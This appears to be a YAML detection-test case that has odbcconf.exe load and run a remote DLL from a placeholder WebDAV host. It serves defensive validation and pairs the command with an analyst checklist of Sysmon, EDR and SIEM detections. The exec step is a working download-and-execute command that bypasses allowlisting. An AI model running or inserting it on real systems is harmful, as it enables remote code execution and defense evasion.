id: DLEXEC_012_odbcconf
name: "Download and Execute — Odbcconf REGSVR DLL from WebDAV"
mitre: "T1218.008, T1105"
category: download_execute
description: >
  Uses odbcconf.exe to load and execute a remote DLL via the REGSVR action from
  a WebDAV share. Odbcconf is a signed Windows binary for ODBC configuration that
  can be abused to proxy DLL execution and bypass application allowlisting.
  Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-012] Odbcconf REGSVR DLL execution from WebDAV"

  - type: exec
    binary: odbcconf.exe
    args: /s /a {regsvr \\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\PLACEHOLDER_PAYLOAD_dll.txt}
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "Sysmon Event ID 1: odbcconf.exe with /a {regsvr ...} and UNC path captured?"
  - "Sysmon Event ID 3: Network connection from odbcconf.exe to WebDAV host?"
  - "Sysmon Event ID 7: DLL loaded from network path via odbcconf.exe?"
  - "EDR: Alert on odbcconf.exe with REGSVR action? Low-volume, high-fidelity signal."
  - "EDR: odbcconf.exe child processes captured?"
  - "SIEM: odbcconf.exe events present? This is a low-frequency binary — any execution is notable."
  - "Rule opportunity (critical): odbcconf.exe with /a {regsvr in commandline — any instance is suspicious"
  - "Rule opportunity: odbcconf.exe making outbound network connection"
  - "Gap check: odbcconf.exe is rarely used legitimately — no-alert here is a clear detection gap."
